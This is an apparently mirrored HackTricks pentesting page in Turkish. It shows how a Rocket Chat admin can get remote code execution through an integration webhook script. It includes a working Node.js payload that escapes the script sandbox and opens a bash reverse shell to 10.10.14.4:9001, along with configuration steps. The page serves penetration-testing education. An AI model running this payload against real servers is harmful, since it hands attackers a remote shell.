mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-18 06:58:27 +00:00
4.2 KiB
4.2 KiB
Rocket Chat
AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Red Team Expert) ile!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
- Resmi PEASS & HackTricks ürünlerini edinin
- [The PEASS Family]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [NFT'lerimiz]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
- **💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter 🐦 @carlospolopm'de takip edin.
- Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
![](https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif)
{% embed url="https://websec.nl/" %}
RCE
Eğer Rocket Chat içinde adminseniz RCE elde edebilirsiniz.
Integrations
'a gidin veNew Integration
'ı seçin ve herhangi birini seçin:Incoming WebHook
veyaOutgoing WebHook
./admin/integrations/incoming
![](/Mirrors/hacktricks/media/commit/8ce299257fe1a9c19d7816cc9365a169710b314b/.gitbook/assets/image%20%28266%29.png)
- Belgelere göre her ikisi de veriyi işlemek için ES2015 / ECMAScript 6 (temelde JavaScript) kullanır. Bu yüzden nodejs için bir rev shell alalım:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- WebHook'u yapılandırın (kanal ve kullanıcı adı olarak gönderi mevcut olmalıdır):
![](/Mirrors/hacktricks/media/commit/8ce299257fe1a9c19d7816cc9365a169710b314b/.gitbook/assets/image%20%28905%29.png)
- WebHook betiğini yapılandırın:
![](/Mirrors/hacktricks/media/commit/8ce299257fe1a9c19d7816cc9365a169710b314b/.gitbook/assets/image%20%28572%29.png)
- Değişiklikleri kaydedin
- Oluşturulan WebHook URL'sini alın:
![](/Mirrors/hacktricks/media/commit/8ce299257fe1a9c19d7816cc9365a169710b314b/.gitbook/assets/image%20%28937%29.png)
- Curl ile çağırın ve ters shell'i almalısınız
![](https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif)
{% embed url="https://websec.nl/" %}
Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin htARTE (HackTricks AWS Red Team Expert)!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Family koleksiyonumuzu keşfedin, özel NFT'lerimiz arasında
- 💬 Discord grubuna katılın (https://discord.gg/hRep4RUj7f) veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
- Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.